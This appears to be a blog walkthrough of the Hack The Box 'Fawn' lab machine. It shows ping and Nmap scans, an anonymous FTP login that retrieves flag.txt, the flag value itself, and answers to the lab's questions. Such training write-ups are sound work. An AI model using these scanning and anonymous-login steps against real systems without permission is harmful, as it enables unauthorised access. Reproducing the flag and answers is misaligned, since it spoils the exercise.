Dear friend, welcome to haXez, and thank you for stopping by. Today we’re looking at the Hack The Box Machine Fawn. It’s a super easy box that requires you to enumerate the services on the box and then utilize those services to capture the flag. There are also a number of questions that you need to answer to own the machine.
The first thing we need to do is to spawn an instance of the machine. However, a prerequisite of spawning the machine is connecting to the VPN. I’ve covered this before in my Meow walkthrough so have a look there if you don’t know where to start. Once you have connected and spawned a machine you will be given an IP address.
Ping The Thing
In order to check that we can communicate with the machine, we can use the tool ping to see if it responds to our ICMP packets. This can be run from the terminal by typing ping followed by the IP address of the box. As you can see from the output below, I sent four ping requests to the machine and it responded successfully.
┌──(kali㉿kali)-[~] └─$ ping 10.129.247.20 PING 10.129.247.20 (10.129.247.20) 56(84) bytes of data. 64 bytes from 10.129.247.20: icmp_seq=1 ttl=63 time=15.2 ms 64 bytes from 10.129.247.20: icmp_seq=2 ttl=63 time=14.3 ms 64 bytes from 10.129.247.20: icmp_seq=3 ttl=63 time=14.7 ms 64 bytes from 10.129.247.20: icmp_seq=4 ttl=63 time=14.9 ms --- 10.129.247.20 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 3004ms rtt min/avg/max/mdev = 14.349/14.776/15.169/0.293 ms
A Lap With Nmap
Now that we know we can communicate with the Fawn machine, we need to enumerate what services the machine is running. We can do this using our favorite network mapping tool Nmap. It is good practice to throw some additional flags or arguments onto your Nmap scan in order to get as much information from the scan as possible. For this reason, we are going to tell Nmap to report back the service and operating system versions. The output below shows that the machine is running vsftpd version 3.0.3 and that the base operating system is Unix.
┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -O -p0- 10.129.247.20 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 12:36 EDT Nmap scan report for 10.129.247.20 Host is up (0.017s latency). Not shown: 65535 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.92%E=4%D=5/8%OT=21%CT=1%CU=37672%PV=Y%DS=2%DC=I%G=Y%TM=6277F198 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS( OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11 OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN( OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R= OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F= OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: OS: Unix OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.38 seconds
FTP or File Transfer Protocol is a service that allows you to transfer files between a client and server. There are many clients out there including terminal and graphical based ones. One FTP misconfiguration that can be taken advantage of is the anonymous login feature. Anonymous login is just that, it allows you to log in anonymously. You don’t need to know the username or password of an existing user. You just have to specify your name as Anonymous and submit anything for a password. If Anonymous logins are supported then you will be granted access to the files on the FTP server. As you can see below, Anonymous logins are supported by the server and we can log in and view the files using the dir command.
┌──(kali㉿kali)-[~] └─$ ftp 10.129.60.207 Connected to 10.129.60.207. 220 (vsFTPd 3.0.3) Name (10.129.60.207:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 229 Entering Extended Passive Mode (|||43096|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt 226 Directory send OK.
Grab The Flag
The Fawn FTP server appears to have a text file on it called flag.txt Perhaps this is the elusive root flag that we need to capture. In order to download the flag we can use the get command. The get command allows you to download files from the server and you can see an example of me using it to download the flag below.
ftp> get flag.txt local: flag.txt remote: flag.txt 229 Entering Extended Passive Mode (|||31037|) 150 Opening BINARY mode data connection for flag.txt (32 bytes). 100% |***************************************************************** 32 21.00 KiB/s 00:00 ETA 226 Transfer complete. 32 bytes received in 00:00 (0.60 KiB/s)
Once the flag has been downloaded, you can use the cat command to view the contents of the file.
┌──(kali㉿kali)-[~] └─$ cat flag.txt 035db21c881520061c53e0536e44f815
Fawn Questions And Answers
Before we can submit the root flag, there are a number of questions that we need to answer. I will run through these questions now.
Firstly, What does the 3-letter acronym FTP stand for? File Transfer Protocol
What communication model does FTP use, architecturally speaking? Client-Server Model
What is the name of one popular GUI FTP program? Filezilla
Which port is the FTP service active on usually? 21 TCP
What acronym is used for the secure version of FTP? SFTP
What is the command we can use to test our connection to the target? Ping
From your scans, what version is FTP running on the target? vsftpd 3.0.3
From your scans, what OS type is running on the target? Unix
Submit root flag